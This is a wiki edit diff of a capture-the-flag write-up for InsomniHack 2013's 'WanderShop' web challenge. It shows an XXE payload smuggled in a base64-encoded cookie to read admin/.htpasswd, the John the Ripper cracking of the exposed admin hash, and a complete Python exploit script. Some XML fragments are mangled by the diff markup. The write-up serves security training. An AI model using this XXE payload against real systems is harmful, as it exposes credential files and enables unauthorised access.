Changes

InsomniHack-2013/Web2/WanderShop

608 bytes added, 11:32, 26 March 2013

/* Summary */

== Summary ==

* If we are to survive this world, we are going to need some weapons. This shady merchant seems to be selling some interesting stuff. Unfortunately, we have absolutely no cash for this.* Could you break into his shop and get us as many items as you can?* ''' Goal : Access the admin page~~'''~~

== Solution ==

</pre>

* We can then inject XML with the cookie, we use [https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing XML external entities] which allow to manipulate local files and display the result in the XML

<~~pre~~syntaxhighlight lang="xml">

<!DOCTYPE basket

[

</basket>

</~~pre~~syntaxhighlight>

* The result of the XML is parsed and displayed in the paying page, so we put the content of the .htpasswd file in an item element which will be displayed in the table.

* Here's the HTML result

<~~pre~~syntaxhighlight lang="html4strict">

<!DOCTYPE html>

</body>

</html>

</~~pre~~syntaxhighlight>

* The password is in CRYPT format, which is easily bruteforced with john the ripper

echo 'admin:sQcHhNWX6v1VM' > /tmp/pass

>slamas (admin)

* The flag is in the admin page

* Complete script

#!/usr/bin/env python

import requests, urllib2, base64

url = 'http://web02.insomni.hack/1a5b4e6f811a0bc0dcb8fdd773bdb51c571be4e6/'

payload='''

<!DOCTYPE basket

[

<!ENTITY item SYSTEM "admin/.htpasswd">

]>

</basket>

'''

payload = urllib2.quote(base64.encodestring(payload))

cookie = {'basket': payload}

r = requests.get(url + 'checkout.php', cookies=cookie)

print r.content

</syntaxhighlight>

== See also ==

* [[InsomniHack-2013]]

← Older edit

Rorist

ControlGroup, administrator

4,205

edits

Changes

InsomniHack-2013/Web2/WanderShop

Navigation menu

Personal tools

Namespaces

Variants

Views

More

Search

Navigation

Tools